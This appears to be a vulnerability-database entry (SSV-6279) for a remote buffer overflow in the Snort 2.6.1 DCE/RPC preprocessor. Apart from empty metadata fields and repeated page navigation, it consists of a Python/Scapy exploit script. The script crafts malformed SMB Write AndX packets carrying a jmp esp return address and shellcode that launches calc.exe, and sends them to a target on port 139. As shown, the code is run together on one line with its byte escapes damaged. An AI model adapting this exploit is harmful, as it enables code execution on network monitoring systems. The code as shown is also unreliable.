Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit

基本字段

漏洞编号：: SSV-6279

披露/发现时间：: 未知

提交时间：: 2007-03-02

漏洞等级：

漏洞类别：: 远程溢出

影响组件：

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.25KB

#!/usr/bin/python # # Snort DCE/RPC Preprocessor Buffer Overflow (Command Execution Version) #  # Author: Trirat Puttaraksa <trir00t [at] gmail.com> # # http://sf-freedom.blogspot.com # ###################################################### # For educational purpose only # # This exploit call calc.exe on Windows XP SP2 + Snort 2.6.1 # # Note: this exploit use Scapy (http://www.secdev.org/projects/scapy/)  # to inject the packet, so you have to install Scapy before use it. # ####################################################### import sys from scapy import * from struct import pack conf.verb = 0 # NetBIOS Session Service payload = \"x00x00x02xab\" # SMB Header payload += \"xffx53x4dx42x75x00x00x00x00x18x07xc8x00x00\" payload += \"x00x00x00x00x00x00x00x00x00x00x00x00xffxfe\" payload += \"x00x08x30x00\" # Tree Connect AndX Request payload += \"x04xa2x00x52x00x08x00x01x00x27x00x00\" payload += \"x5cx00x5cx00x49x00x4ex00x53x00x2dx00x4bx00x49x00\" payload += \"x52x00x41x00x5cx00x49x00x50x00x43x00x24x00x00x00\" payload += \"x3fx3fx3fx3fx3fx00\" # NT Create AndX Request payload += \"x18x2fx00x96x00x00x0ex00x16x00x00x00x00x00x00x00\" payload += \"x9fx01x02x00x00x00x00x00x00x00x00x00x00x00x00x00\" payload += \"x03x00x00x00x01x00x00x00x40x00x40x00x02x00x00x00\" payload += \"x01x11x00x00x5cx00x73x00x72x00x76x00x73x00x76x00\" payload += \"x63x00x00x00\" # Write AndX Request #1 payload += \"x0ex2fx00xfex00x00x40x00x00x00x00xffxffxffxffx80\" payload += \"x00x48x00x00x00x48x00xb6x00x00x00x00x00x49x00xee\" #payload += \"x05x00x0bx03x10x00x00x00xffx01x00x00x01x00x00x00\" payload += \"x05x00x0bx03x10x00x00x00x10x02x00x00x01x00x00x00\" payload += \"xb8x10xb8x10x00x00x00x00x01x00x00x00x00x00x01x00\" payload += \"xc8x4fx32x4bx70x16xd3x01x12x78x5ax47xbfx6exe1x88\" payload += \"x03x00x00x00x04x5dx88x8axebx1cxc9x11x9fxe8x08x00\" payload += \"x2bx10x48x60x02x00x00x00\" # Write AndX Request #2 payload += \"x0exffx00xdexdex00x40x00x00x00x00xffxffxffxffx80\" payload += \"x00x48x00x00x00xffx01xcex01x00x00x00x00x49x00xee\" # 0x7c941eed -> jmp esp; make stack happy; windows/exec calc.exe (metasploit.com) payload += \"xedx1ex94x7cx90x81xc4xffxefxffxffx44\" payload += \"x31xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xa9\" payload += \"xd1x80xf5x83xebxfcxe2xf4x55x39xc4xf5xa9xd1x0bxb0\" payload += \"x95x5axfcxf0xd1xd0x6fx7exe6xc9x0bxaax89xd0x6bxbc\" payload += \"x22xe5x0bxf4x47xe0x40x6cx05x55x40x81xaex10x4axf8\" payload += \"xa8x13x6bx01x92x85xa4xf1xdcx34x0bxaax8dxd0x6bx93\" payload += \"x22xddxcbx7exf6xcdx81x1ex22xcdx0bxf4x42x58xdcxd1\" payload += \"xadx12xb1x35xcdx5axc0xc5x2cx11xf8xf9x22x91x8cx7e\" payload += \"xd9xcdx2dx7exc1xd9x6bxfcx22x51x30xf5xa9xd1x0bx9d\" payload += \"x95x8exb1x03xc9x87x09x0dx2ax11xfbxa5xc1xafx58x17\" payload += \"xdaxb9x18x0bx23xdfxd7x0ax4exb2xe1x99xcaxffxe5x8d\" payload += \"xccxd1x80xf5\" payload += \"x90\"  # padding if len(sys.argv) != 2: print \"Usage snort_execute_dcerpc.py <fake destination ip>\" sys.exit(1) target = sys.argv[1] p = IP(dst=target) / TCP(sport=1025, dport=139, flags=\"PA\") / payload send(p)  

共 1 兑换

参考链接

解决方案

临时解决方案

官方解决方案

防护方案

匿名兑换PoC

生命线

发现/披露了漏洞
2007-03-02 提交了漏洞
2007-03-02 提交更新了 PoC

Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定